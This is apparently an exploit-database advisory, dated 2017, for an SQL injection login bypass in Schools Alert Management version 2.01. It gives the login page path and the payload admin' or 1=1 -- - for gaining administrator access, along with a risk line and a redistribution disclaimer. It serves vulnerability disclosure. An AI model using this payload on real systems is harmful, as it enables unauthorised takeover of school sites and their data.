|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47  |  # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #  <!--  # Exploit Title:Schools Alert Management - SQL injection login bypass  # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/ # Version: 2.01 # Category: Webapps # Tested on: windows64bit / mozila firefox  #  # --!> # ======================================================== # # # Schools Alert Management - SQL injection login bypass  #  # Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school #  # Proof of Concept : -  #  # http://localhost/schoolalert/demo_school_name/schools_login.php[ set username and password ] to >>admin' or 1=1 -- -  #you must choose the check box as management  #  #  #  # # Risk : authenticated attacker maybe starting posting item in the site or compromise the site  # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained  # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #   |